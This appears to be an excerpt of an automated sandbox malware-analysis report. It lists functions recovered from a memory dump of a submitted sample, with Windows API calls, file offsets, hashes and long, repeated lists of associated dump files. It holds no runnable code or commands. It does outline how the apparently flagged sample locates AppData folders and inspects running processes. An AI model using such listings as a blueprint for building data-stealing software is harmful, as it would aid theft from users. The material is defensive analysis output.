                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$Xue$xte
                          • API String ID: 3105635775-3528272311
                          • Opcode ID: fb2672092ff57117544d4587f75bfde0061e2057a74e32b796b91786e193df9e
                          • Instruction ID: 1805a41b787d6d18d15e0c6b1b3a553890efb56b70978767309f363308cd041a
                          • Opcode Fuzzy Hash: fb2672092ff57117544d4587f75bfde0061e2057a74e32b796b91786e193df9e
                          • Instruction Fuzzy Hash: FF01C071445B00DED760AF79D80974EBBE2AF50321F20891EE4D6676E1CFB0AA44CB18
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E581
                          • lstrcat.KERNEL32(?,0129D128), ref: 0063E59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: d8e0d4864dfd55359cf7bc69c363ca2241e900c7cd21872c3afb5d7797ab027c
                          • Instruction ID: c35eec4d3dafe15f6b7070650ab3385727ef15bd53373671b10587d0d879d9cf
                          • Opcode Fuzzy Hash: d8e0d4864dfd55359cf7bc69c363ca2241e900c7cd21872c3afb5d7797ab027c
                          • Instruction Fuzzy Hash: 3B5192B1A10218AFC795EB54EC43EEE337EBF48311F04449DB90697281EE75AE448FA5
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00641FDF, 00641FF5, 006420B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: ca13ade2c28b2da9062c63d1b3a7e364067111c15b31b3d9df02294e2bff1259
                          • Instruction ID: 9271ed72ca585625899bbb83fb01dde85ae86430bd87fba90809ef96712d8ea4
                          • Opcode Fuzzy Hash: ca13ade2c28b2da9062c63d1b3a7e364067111c15b31b3d9df02294e2bff1259
                          • Instruction Fuzzy Hash: 7C215A3951018B9FC720EA39D4A47DDF7E7DF80B66FE44096E8184B341E332098AD796
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0063EBF1
                          • lstrcat.KERNEL32(?,0129D930), ref: 0063EC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: cf30b3fbc51f9f5c75d3f2fc64913c3499e0a167d317e67dab1ed7fdefe6dbb8
                          • Instruction ID: 584934b5a3d13867eb3a3601ae71bff5fb34119f0f13d272ce8b2ef54b73e12c
                          • Opcode Fuzzy Hash: cf30b3fbc51f9f5c75d3f2fc64913c3499e0a167d317e67dab1ed7fdefe6dbb8
                          • Instruction Fuzzy Hash: 8431B971A10529EBCB51EF64EC52BED77B5BF48301F1005A9F60697284DE349E448F94
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00644492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006444AD
                          • CloseHandle.KERNEL32(00000000), ref: 006444B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 006444E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: ad22754f2ef57bfb8d168792935169b9fa4aa7cde3c8f616af0ce99228dbae0f
                          • Instruction ID: 2f14a37865f54dbee474e5a3db7d2aa01d6ba46dc2a36ab4e3be64820c9eadb8
                          • Opcode Fuzzy Hash: ad22754f2ef57bfb8d168792935169b9fa4aa7cde3c8f616af0ce99228dbae0f
                          • Instruction Fuzzy Hash: F8F0FCF09017256BE7209B749C49BEABAE9FF14305F000591FA89D72C0DFB88C848B90
                          APIs
                          • __getptd.LIBCMT ref: 00648FDD
                            • Part of subcall function 006487FF: __amsg_exit.LIBCMT ref: 0064880F
                          • __getptd.LIBCMT ref: 00648FF4
                          • __amsg_exit.LIBCMT ref: 00649002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00649026
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 53eeb1f8dff83bf67eb43817a87e0c551d7c9f34fc49af425adca6aea98107f0
                          • Instruction ID: f166ffea4b17a51a9848e2c01258d2305ce1a5a80a2a807d484d6329ec000ff1
                          • Opcode Fuzzy Hash: 53eeb1f8dff83bf67eb43817a87e0c551d7c9f34fc49af425adca6aea98107f0
                          • Instruction Fuzzy Hash: 52F0B4329487109FDBE0BF78A80BB5E37A36F10B21F24411DF444AB2D2DF645900DA6D
                          APIs
                          • lstrlen.KERNEL32(------,00625BEB), ref: 0064731B
                          • lstrcpy.KERNEL32(00000000), ref: 0064733F
                          • lstrcat.KERNEL32(?,------), ref: 00647349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: cab6199fbb4c3c864efed2d61faffeb9a75955105be6b9589437f2960840f2ed
                          • Instruction ID: a27cfdd22a1704ce7615db6769d1918c4d41bf55fe041290e56da198cd54c0eb
                          • Opcode Fuzzy Hash: cab6199fbb4c3c864efed2d61faffeb9a75955105be6b9589437f2960840f2ed
                          • Instruction Fuzzy Hash: 3DF0C974911712DFDB659F35D848926BAFAFF84701318882DA8DAC7314EB34E840DB10
                          APIs
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633422
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633471
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633497
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 741e812b788fe29f0b94ca31c043437a274da5db3665348641755be974a6bdc3
                          • Instruction ID: fd37c9f39cdbd2b9d260ceb8de4e16d4f62c681177b638697426b5c0310eafc4
                          • Opcode Fuzzy Hash: 741e812b788fe29f0b94ca31c043437a274da5db3665348641755be974a6bdc3
                          • Instruction Fuzzy Hash: C8120A70A012218FDB28CF19C554B65B7E6BF45329F19C0AEE809CB3A2D776DD42CB84
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637CAF
                            • Part of subcall function 00637D40: std::_Xinvalid_argument.LIBCPMT ref: 00637D58
                            • Part of subcall function 00637D40: std::_Xinvalid_argument.LIBCPMT ref: 00637D76
                            • Part of subcall function 00637D40: std::_Xinvalid_argument.LIBCPMT ref: 00637D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: 177b0de2cd1650a5e7ccb056248f10d88ea9b28cc544b571c1ea36317229cf02
                          • Instruction ID: ac1ff1e8f40348df547510586778ba6dab97188b71ea16e11eb594798acd3d56
                          • Opcode Fuzzy Hash: 177b0de2cd1650a5e7ccb056248f10d88ea9b28cc544b571c1ea36317229cf02
                          • Instruction Fuzzy Hash: 0C31D4B23086149FE7349E6CE8809AAF3EBEF91760F20566AF5458B741D7719C4183E8
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00626F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00626F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: e355b0706bcd2b49e976105cef3d2a5702761890517ce529a66f424950adb2bd
                          • Instruction ID: 0eeea062d58b5ef2b1a4180dea969d2fcd5ad97430270673ecd5f0cb1eff7e16
                          • Opcode Fuzzy Hash: e355b0706bcd2b49e976105cef3d2a5702761890517ce529a66f424950adb2bd
                          • Instruction Fuzzy Hash: 37218171600B119BEB20CF24ED85BB673EAEB40705F44887CF986CBA84E779E945CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064244C
                          • lstrlen.KERNEL32(00000000), ref: 006424E9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00642570
                          • lstrlen.KERNEL32(00000000), ref: 00642577
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 232fa06a03ab4ce8212a0759f1b3722e057e333810c19676639ff892de57acdd
                          • Instruction ID: cf992fdcd4fb75956b81da812d92acf4fe9a06b11c8f850dc2a512423f3c5817
                          • Opcode Fuzzy Hash: 232fa06a03ab4ce8212a0759f1b3722e057e333810c19676639ff892de57acdd
                          • Instruction Fuzzy Hash: 0381C2B0E002069BDB14DF95DC54BAEB7B6FF84301F64806DE508A7381EB799D46CB94
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 006415A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 006415D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641611
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641649
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
